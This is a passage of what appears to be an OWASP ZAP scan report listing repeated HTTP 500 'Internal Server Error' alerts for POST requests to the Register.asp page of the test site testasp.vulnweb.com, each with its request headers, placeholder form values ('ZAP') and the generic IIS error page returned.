Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
